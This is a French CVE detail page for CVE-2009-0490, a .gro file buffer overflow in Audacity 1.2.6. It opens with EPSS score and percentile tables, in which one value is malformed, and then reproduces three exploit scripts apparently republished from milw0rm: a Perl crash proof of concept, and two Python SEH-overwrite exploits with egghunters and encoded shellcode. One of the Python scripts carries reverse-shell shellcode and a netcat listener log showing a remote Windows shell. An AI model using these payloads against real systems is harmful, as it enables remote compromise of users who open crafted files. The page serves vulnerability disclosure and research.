CVE-2009-0490 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	10.6%	–	–
2022-04-03	–	–	10.6%	–	–
2022-11-06	–	–	10.6%	–	–
2023-01-01	–	–	10.6%	–	–
2023-02-26	–	–	10.6%	–	–
2023-03-12	–	–	–	8.07%	–
2023-05-21	–	–	–	6.86%	–
2024-02-11	–	–	–	6.86%	–
2024-06-02	–	–	–	6.86%	–
2024-09-29	–	–	–	7.14%	–
2024-12-22	–	–	–	19.94%	–
2025-01-19	–	–	–	19.94%	–
2025-03-18	–	–	–	–	56.68%
2025-03-18	–	–	–	–	56.68,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	88%
2022-04-03	94%
2022-11-06	95%
2023-01-01	94%
2023-02-26	95%
2023-03-12	93%
2023-05-21	93%
2024-02-11	94%
2024-06-02	94%
2024-09-29	94%
2024-12-22	96%
2025-01-19	96%
2025-03-18	98%
2025-03-18	98%

# ----------------------------------------------------------- # Author : Houssamix # ----------------------------------------------------------- # Audacity 1.2.6 (.gro file ) Local buffer overflow POC # download : http://audacity.sourceforge.net/ # Audacity® is free, open source software for recording and editing sounds. # Description: # When we select : project > import midi.. and we import ".gro" file contains long Chars # The Program Will crash and The Following Happen: # EAX:05050504 ECX:01414141 EDX:01520608 EBX:0012F154 # ESP:0012EF10 EBP:00000000 ESI:41414141 EDI:00000000 # EIP:006AEC54 audacity.006AEC54 # Access violation When Reading [41414141] # And Also The Pointer to next SEH record and SE Handler Will gonna BE Over-wrote # Poc : # -------------------------------------------------------- #!/usr/bin/perl #[*] Bug : Audacity 1.2.6 (.gro file ) Local buffer overflow use warnings; use strict; my $chars = "\x41" x 2000 ; my $file="hsmx.gro"; open(my $FILE, ">>$file") or die "Cannot open $file: $!"; print $FILE $chars; close($FILE); print "$file has been created . import it in audacity \n"; # ---------------------------------------------------------- # milw0rm.com [2009-01-01]

#!/usr/bin/env python # # Audacity <= 1.2 .gro universal buffer overflow exploit # Author: mr_me # Download: http://audacity.sourceforge.net/download/ # Tested on Wind0ws XP sp3 & Vist@ # # Greetz fly to Muts and the offensive-security team # also to my wonderful partner Vanessa F for putting up with me :P # http://www.offensive-security.com/information-security-training.php # # Original: www.milw0rm.com/exploits/7634 ################################################# # # samurai@mrme:~$ nc -lvp 4444 # listening on [any] 4444 ... # 192.168.2.3: inverse host lookup failed: Unknown server error : # Connection timed out # connect to [192.168.2.3] from (UNKNOWN) [192.168.2.3] 55164 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Program Files\Audacity> print " [+] Creating eviL .gro file..." buff = ("\x44" * 174) buff += ("\xEB\x08\x90\x90") buff += ("\x22\x23\x17\x01") buff += "\x90"* 4 buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "\x57\x30\x30\x54" # this is the egg... "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") buff += ("\xCC" * 1000); buff += "W00TW00T" # Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space) buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b" "\x4f\x4b\x4f\x45\x30\x4c\x4b\x42\x4c\x46\x44\x47\x54\x4c\x4b" "\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x44\x38\x45\x51\x4a" "\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51" "\x4a\x4b\x50\x49\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x50" "\x31\x49\x50\x4d\x49\x4e\x4c\x4d\x54\x49\x50\x44\x34\x44\x47" "\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4b\x44\x47" "\x4b\x50\x54\x47\x54\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f" "\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c" "\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x45\x53\x46\x4c\x4c\x4b" "\x4d\x59\x42\x4c\x51\x34\x45\x4c\x45\x31\x49\x53\x46\x51\x49" "\x4b\x45\x34\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x51\x50\x44\x4c" "\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x51\x50\x45\x58\x51" "\x4e\x42\x48\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f" "\x4e\x36\x43\x56\x50\x53\x45\x36\x42\x48\x46\x53\x50\x32\x45" "\x38\x43\x47\x44\x33\x46\x52\x51\x4f\x51\x44\x4b\x4f\x48\x50" "\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x50\x50\x4b\x4f\x4e" "\x36\x51\x4f\x4c\x49\x4a\x45\x45\x36\x4b\x31\x4a\x4d\x44\x48" "\x45\x52\x46\x35\x42\x4a\x44\x42\x4b\x4f\x48\x50\x45\x38\x4e" "\x39\x45\x59\x4c\x35\x4e\x4d\x51\x47\x4b\x4f\x49\x46\x46\x33" "\x51\x43\x51\x43\x51\x43\x50\x43\x51\x43\x47\x33\x51\x43\x4b" "\x4f\x4e\x30\x42\x48\x49\x50\x49\x38\x45\x52\x45\x53\x42\x46" "\x42\x48\x44\x51\x51\x4c\x43\x56\x50\x53\x4b\x39\x4d\x31\x4d" "\x45\x43\x58\x4a\x4c\x4c\x39\x4e\x4a\x43\x50\x51\x47\x4b\x4f" "\x4e\x36\x42\x4a\x42\x30\x46\x31\x46\x35\x4b\x4f\x48\x50\x42" "\x46\x43\x5a\x42\x44\x43\x56\x42\x48\x45\x33\x42\x4d\x42\x4a" "\x46\x30\x50\x59\x46\x49\x48\x4c\x4b\x39\x4a\x47\x43\x5a\x47" "\x34\x4d\x59\x4b\x52\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4a\x35" "\x4d\x59\x4b\x4d\x4b\x4e\x50\x42\x46\x4d\x4b\x4e\x50\x42\x46" "\x4c\x4c\x4d\x42\x5a\x47\x48\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38" "\x42\x52\x4b\x4e\x48\x33\x42\x36\x4b\x4f\x42\x55\x47\x58\x4b" "\x4f\x49\x46\x51\x4b\x51\x47\x51\x42\x46\x31\x50\x51\x46\x31" "\x42\x4a\x43\x31\x50\x51\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e" "\x30\x42\x48\x4e\x4d\x4e\x39\x43\x35\x48\x4e\x51\x43\x4b\x4f" "\x48\x56\x42\x4a\x4b\x4f\x4b\x4f\x47\x47\x4b\x4f\x4e\x30\x42" "\x48\x4d\x37\x43\x49\x48\x46\x43\x49\x4b\x4f\x42\x55\x44\x44" "\x4b\x4f\x49\x46\x4b\x4f\x43\x47\x4b\x4c\x4b\x4f\x4e\x30\x43" "\x58\x4a\x50\x4c\x4a\x45\x54\x51\x4f\x50\x53\x4b\x4f\x4e\x36" "\x4b\x4f\x48\x50\x44\x4a\x41\x41") file = open('mr_mes_eviL.gro','w'); file.write(buff); file.close(); print " [+] mr_mes_eviL.gro File created successfully. :)" # milw0rm.com [2009-08-24]

#exploit.py # Audacity 1.2.6 (gro File) Buffer overflow Exploit # By: Encrypt3d.M!nd # http://m1nd3d.wordpress.com/ ##################################################### # i know this exploit already been posted, but the author # used an address as an universal,well,it's universal but # it can't be called to jump.because it cause privileged_ # exception,so you can just use it. # # Tested on: Windows xp sp3 # chars = "\x44" * 174 ns= "\xeb\x08\x90\x90" sh= "\xbe\x2e\xd1\x72" # Windows xp sp3 - msacm32.drv nops= "\x90"* 20 eggh= "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" shellcode= "\x69\x72\x61\x71\x69\x72\x61\x71" shellcode+= ( "\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" "\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39" "\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c" "\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62" "\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45" "\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c" "\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48" "\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42" "\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f" "\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48" "\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47" "\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51" "\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47" "\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d" "\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c" "\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c" "\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46" "\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34" "\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49" "\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76" "\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43" "\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77" "\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42" "\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c" "\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44" "\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30" "\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43" "\x30\x41\x41") file = open('Devil.gro','w') file.write(chars+ns+sh+nops+eggh+chars+shellcode) file.close()